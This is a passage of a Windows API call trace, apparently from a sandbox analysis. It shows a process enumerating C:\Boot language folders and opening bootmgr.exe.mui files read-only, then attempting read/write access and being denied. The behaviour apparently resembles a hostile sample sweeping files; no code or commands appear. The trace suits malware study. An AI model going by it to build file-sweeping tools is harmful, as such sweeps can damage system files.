FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.561] FindFirstFileExW (in: lpFileName="C:\\Boot\\es-MX\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x786d0 [0069.561] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.561] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0069.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.562] AreFileApisANSI () returned 1 [0069.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\es-MX\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\es-MX\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0069.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.563] AreFileApisANSI () returned 1 [0069.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0069.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 30 [0069.563] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.563] GetFileType (hFile=0x418) returned 0x1 [0069.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.563] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.563] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.564] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.564] CloseHandle (hObject=0x418) returned 1 [0069.564] AreFileApisANSI () returned 1 [0069.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0069.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\es-MX\\bootmgr.exe.mui") returned 30 [0069.564] CreateFileW (lpFileName="C:\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.564] GetLastError () returned 0x5 [0069.564] GetLastError () returned 0x5 [0069.564] SetLastError (dwErrCode=0x5) [0069.564] GetLastError () returned 0x5 [0069.564] SetLastError (dwErrCode=0x5) [0069.564] GetLastError () returned 0x5 [0069.564] SetLastError (dwErrCode=0x5) [0069.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.565] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69178, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⽠\x01⺊Ā")) returned 0 [0069.565] FindClose (in: hFindFile=0x786d0 | out: hFindFile=0x786d0) returned 1 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0069.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0069.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.565] AreFileApisANSI () returned 1 [0069.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\et-EE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\et-EE", lpUsedDefaultChar=0x0) returned 14 [0069.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0069.566] AreFileApisANSI () returned 1 [0069.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88810 [0069.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88810, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\et-EE") returned 14 [0069.566] CreateFileW (lpFileName="C:\\Boot\\et-EE" (normalized: "c:\\boot\\et-ee"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.566] GetLastError () returned 0x5 [0069.566] GetLastError () returned 0x5 [0069.566] SetLastError (dwErrCode=0x5) [0069.566] GetLastError () returned 0x5 [0069.566] SetLastError (dwErrCode=0x5) [0069.566] GetLastError () returned 0x5 [0069.566] SetLastError (dwErrCode=0x5) [0069.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.566] AreFileApisANSI () returned 1 [0069.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0069.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\et-EE") returned 14 [0069.566] CreateFileW (lpFileName="C:\\Boot\\et-EE" (normalized: "c:\\boot\\et-ee"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.567] GetLastError () returned 0x5 [0069.567] GetLastError () returned 0x5 [0069.567] SetLastError (dwErrCode=0x5) [0069.567] GetLastError () returned 0x5 [0069.567] SetLastError (dwErrCode=0x5) [0069.567] GetLastError () returned 0x5 [0069.567] SetLastError (dwErrCode=0x5) [0069.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.567] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.567] FindFirstFileExW (in: lpFileName="C:\\Boot\\et-EE\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78210 [0069.567] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.567] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.568] AreFileApisANSI () returned 1 [0069.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\et-EE\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\et-EE\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0069.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.569] AreFileApisANSI () returned 1 [0069.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 